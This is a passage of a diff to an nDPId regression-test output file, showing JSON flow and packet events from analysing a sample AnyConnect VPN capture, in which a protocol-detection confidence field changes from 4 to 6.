-00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":223,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687261485,"flow_last_seen":1569687261485,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1569687261485,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":59222,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"lp-rkerur-osx.hsd1.ca.comcast.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":223,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687261485,"flow_last_seen":1569687261485,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1569687261485,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":59222,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"lp-rkerur-osx.hsd1.ca.comcast.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":224,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687261486,"flow_last_seen":1569687261486,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1569687261486,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57017,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":224,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1569687261486,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1569687261486,"pkt":"LH6BsEqhNDY7z3UoCABFAABPXz4AAP8RuuYKAADjS0tLS965ADUAO3SWXq8BAAABAAAAAAAADUxQLVJLRVJVUi1PU1gEaHNkMQJjYQdjb21jYXN0A25ldAAAHAAB"} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":224,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687261486,"flow_last_seen":1569687261486,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1569687261486,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57017,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"lp-rkerur-osx.hsd1.ca.comcast.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":224,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687261486,"flow_last_seen":1569687261486,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1569687261486,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57017,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"lp-rkerur-osx.hsd1.ca.comcast.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00584{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":225,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1569687261501,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":145,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":145,"pkt_l4_len":111,"thread_ts_msec":1569687261501,"pkt":"NDY7z3UoLH6BsEqhCABFAACDAABAADoRnvFLS0tLCgAA4wA151YAb4gYIuOBgwABAAAAAQAADUxQLVJLRVJVUi1PU1gEaHNkMQJjYQdjb21jYXN0A25ldAAAAQABwBoABgABAAAcIAAoBmRuczEwMcAiCGRuc2FkbWluwCIBawJtAAAcIAAADhAACTqAAAAcIA=="} 
-00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":225,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687261485,"flow_last_seen":1569687261501,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":1569687261501,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":59222,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"lp-rkerur-osx.hsd1.ca.comcast.net","num_queries":1,"num_answers":1,"reply_code":3,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":225,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687261485,"flow_last_seen":1569687261501,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":1569687261501,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":59222,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"lp-rkerur-osx.hsd1.ca.comcast.net","num_queries":1,"num_answers":1,"reply_code":3,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00584{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":226,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1569687261506,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":145,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":145,"pkt_l4_len":111,"thread_ts_msec":1569687261506,"pkt":"NDY7z3UoLH6BsEqhCABFAACDAABAADoRnvFLS0tLCgAA4wA13rkAbznpXq+BgwABAAAAAQAADUxQLVJLRVJVUi1PU1gEaHNkMQJjYQdjb21jYXN0A25ldAAAHAABwBoABgABAAAcIAAoBmRuczEwMcAiCGRuc2FkbWluwCIBawJtAAAcIAAADhAACTqAAAAcIA=="} -00801{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":226,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687261486,"flow_last_seen":1569687261506,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":1569687261506,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57017,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"lp-rkerur-osx.hsd1.ca.comcast.net","num_queries":1,"num_answers":1,"reply_code":3,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00801{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":226,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687261486,"flow_last_seen":1569687261506,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":1569687261506,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57017,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"lp-rkerur-osx.hsd1.ca.comcast.net","num_queries":1,"num_answers":1,"reply_code":3,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":256,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687262866,"flow_last_seen":1569687262866,"flow_idle_time":7580000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":1,"thread_ts_msec":1569687262866,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"162.222.43.153","src_port":56881,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1569687262866,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1569687262866,"pkt":"LH6BsEqhNDY7z3UoCABFAABEAABAAEAGYVoKAADjot4rmd4xAbu3QBvT9S8yS4AYEAD8CwAAAQEIChwNvkTkAuRNDi2ISqeLxJuBXTMcrWivnw=="} 
00783{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1569687262866,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":292,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":292,"pkt_l4_len":258,"thread_ts_msec":1569687262866,"pkt":"LH6BsEqhNDY7z3UoCABFAAEWAABAAEAGYIgKAADjot4rmd4xAbu3QBvj9S8yS4AYEACf4gAAAQEIChwNvkTkAuRNC2FzYPnyOhEIxzv9HgAAAQAAAAAABf0HAAAAAAAAAFYAAAAAABO4pgAAAfJ1AAAAGzdZOcQAAAAAAAAAAAAAAAAAAAAAAAAAAGwAAAAAEjynVwAAAAAACz6PAAAAAABmQ+JAyo3EgU6LQwAAAAAAAAAAAAAACK7duMsBAQAAAAELYXNg+fI6EQjHO\/0eAAABAAAAAAAF\/QcAAAAAAAAAVgAAAAAAE7imAAAB8nUAAAAbN1k5xAAAAAAAAAAAAAAAAAAAAAAAAAAAbAAAAAASPKdXAAAAAAALPo8AAAAAAAAAAQ=="} 
@@ -178,9 +178,9 @@ 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1569687267035,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687267035,"pkt":"LH6BsEqhNDY7z3UoCABFAABAAABAAEAGwVUKAADjCCVmW95hAbsGNnxMAAAAALAC\/\/9wfAAAAgQFtAEDAwUBAQgKHA3OcQAAAAAEAgAA"} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":299,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1569687267077,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1569687267077,"pkt":"NDY7z3UoLH6BsEqhCABFAAA47VEAAPcGXQsIJWZbCgAA4wG73mHOEwD1BjZ8TZASgABbLAAAAgQFtAEBCAo\/+a5OHA3OcQ=="} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1569687267077,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267077,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0AABAAEAGwWEKAADjCCVmW95hAbsGNnxNzhMA9oAQ\/\/\/yvgAAAQEIChwNzpw\/+a5O"} 
-01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":301,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687267035,"flow_last_seen":1569687267079,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1569687267079,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56929,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"c9f0b47c9805f516e6d3900cb51f7841","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01200{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":303,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687267035,"flow_last_seen":1569687267125,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1600,"flow_avg_l4_payload_len":266,"midstream":0,"thread_ts_msec":1569687267125,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56929,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": 
{"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"c9f0b47c9805f516e6d3900cb51f7841","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA"}} -01587{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":309,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1569687267035,"flow_last_seen":1569687267203,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5944,"flow_avg_l4_payload_len":495,"midstream":0,"thread_ts_msec":1569687267203,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56929,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","server_names":"*.pandion.viasat.com,pandion.viasat.com","ja3":"c9f0b47c9805f516e6d3900cb51f7841","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Entrust, Inc., OU=See www.entrust.net\/legal-terms, OU=(c) 2012 Entrust, Inc. 
- for authorized use only, CN=Entrust Certification Authority - L1K","subjectDN":"C=US, ST=California, L=Carlsbad, O=Viasat Inc., CN=*.pandion.viasat.com","fingerprint":"92:70:CF:E3:69:4B:1D:F4:E2:DE:63:54:EC:DF:40:DB:F3:AC:D1:CA"}} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":301,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687267035,"flow_last_seen":1569687267079,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1569687267079,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56929,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"c9f0b47c9805f516e6d3900cb51f7841","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01200{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":303,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687267035,"flow_last_seen":1569687267125,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1600,"flow_avg_l4_payload_len":266,"midstream":0,"thread_ts_msec":1569687267125,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56929,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": 
{"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"c9f0b47c9805f516e6d3900cb51f7841","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA"}} +01587{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":309,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1569687267035,"flow_last_seen":1569687267203,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5944,"flow_avg_l4_payload_len":495,"midstream":0,"thread_ts_msec":1569687267203,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56929,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","server_names":"*.pandion.viasat.com,pandion.viasat.com","ja3":"c9f0b47c9805f516e6d3900cb51f7841","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Entrust, Inc., OU=See www.entrust.net\/legal-terms, OU=(c) 2012 Entrust, Inc. 
- for authorized use only, CN=Entrust Certification Authority - L1K","subjectDN":"C=US, ST=California, L=Carlsbad, O=Viasat Inc., CN=*.pandion.viasat.com","fingerprint":"92:70:CF:E3:69:4B:1D:F4:E2:DE:63:54:EC:DF:40:DB:F3:AC:D1:CA"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":343,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267453,"flow_last_seen":1569687267453,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687267453,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56865,"dst_port":8008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1569687267453,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267453,"pkt":"pHczjPFANDY7z3UoCABFAAA0AABAAEAGJU0KAADjCgAAld4hH0glPK3eiXsRe4AREAA75QAAAQEIChwN0AsAIb2q"} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":344,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267453,"flow_last_seen":1569687267453,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687267453,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56866,"dst_port":8060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -189,19 +189,19 @@ 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":346,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1569687267455,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267455,"pkt":"pHczjPFANDY7z3UoCABFAAA0AABAAEAGJU0KAADjCgAAld4hH0glPK3fiXsRfIAQEAAaFwAAAQEIChwN0A0AId91"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":347,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267477,"flow_last_seen":1569687267477,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1569687267477,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57253,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1569687267477,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1569687267477,"pkt":"LH6BsEqhNDY7z3UoCABFAAA5Pw0AAP8R2y0KAADjS0tLS9+lADUAJfklv50BAAABAAAAAAAAB21vemlsbGEDb3JnAAABAAE="} 
-00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":347,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267477,"flow_last_seen":1569687267477,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1569687267477,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57253,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"mozilla.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":347,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267477,"flow_last_seen":1569687267477,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1569687267477,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57253,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"mozilla.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":348,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267481,"flow_last_seen":1569687267481,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1569687267481,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":62427,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":348,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1569687267481,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":84,"pkt_l4_len":50,"thread_ts_msec":1569687267481,"pkt":"LH6BsEqhNDY7z3UoCABFAABG89oAAP8RJlMKAADjS0tLS\/PbADUAMlit7RYBAAABAAAAAAAADGRldGVjdHBvcnRhbAdmaXJlZm94A2NvbQAAAQAB"} -00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":348,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267481,"flow_last_seen":1569687267481,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1569687267481,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":62427,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": 